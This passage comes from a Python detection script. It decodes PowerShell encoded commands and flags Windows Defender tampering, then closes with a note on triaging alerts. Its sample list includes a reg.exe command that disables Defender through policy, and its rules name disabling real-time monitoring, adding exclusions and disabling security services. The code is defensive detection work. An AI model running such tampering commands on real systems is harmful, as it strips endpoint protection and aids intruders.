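    "reg.exe add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f",
    "powershell.exe -enc dGhpcyBpcyBub3QgdXRmMTY=",   # valid base64 but not UTF-16LE: decoding must fail safely
]

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus the explicit -ec alias
_SWITCHES = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}
ENC_RE = re.compile(r"(?:^|\s)[-/](?:" + "|".join(sorted(_SWITCHES, key=len, reverse=True)) +
                    r")\s+[\"']?([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# (name, regex over lower-cased raw + decoded text); assumed rule set, extend for other Mp settings
TAMPER_RULES = [
    ("defender_realtime_disabled",      r"set-mppreference\b.*-disablerealtimemonitoring\s+(?:\$true|1)\b"),
    ("defender_feature_disabled",       r"set-mppreference\b.*-disable\w+\s+(?:\$true|1)\b"),
    ("defender_exclusion_added",        r"add-mppreference\b.*-exclusion(?:path|process|extension)\b"),
    ("security_service_start_disabled", r"\\services\\(?:windefend|wdnissvc|sense|securityhealthservice|wscsvc)\b.*/v\s+start\b.*/d\s+4\b"),
    ("defender_policy_disable",         r"\\windows defender\b.*/v\s+disableanti(?:spyware|virus)\b.*/d\s+1\b"),
]
_COMPILED = [(n, re.compile(rx)) for n, rx in TAMPER_RULES]


def decode_powershell_b64(blob):
    """Decode an -EncodedCommand payload; None when it is not base64 or not UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    m = ENC_RE.search(cmdline)
    decoded = decode_powershell_b64(m.group(1)) if m else None
    # rules run over the raw line and the decoded script together, so encoding hides nothing
    text = cmdline.lower() + ("\n" + decoded.lower() if decoded else "")
    rules = [name for name, rx in _COMPILED if rx.search(text)]
    return {"cmdline": cmdline, "encoded": m is not None, "decoded": decoded, "rules": rules}


def hunt(cmdlines):
    return [analyze(c) for c in cmdlines]


if __name__ == "__main__":
    for r in hunt(SAMPLE_CMDLINES):
        print(r["encoded"], r["rules"], r["decoded"])
```

The third sample is the case the package description is careful about: an encoded command that decodes to something harmless. Surfacing the decoded text next to the raw line is what lets an analyst close that alert in seconds while the Set-MpPreference and Start=4 cases go straight to escalation.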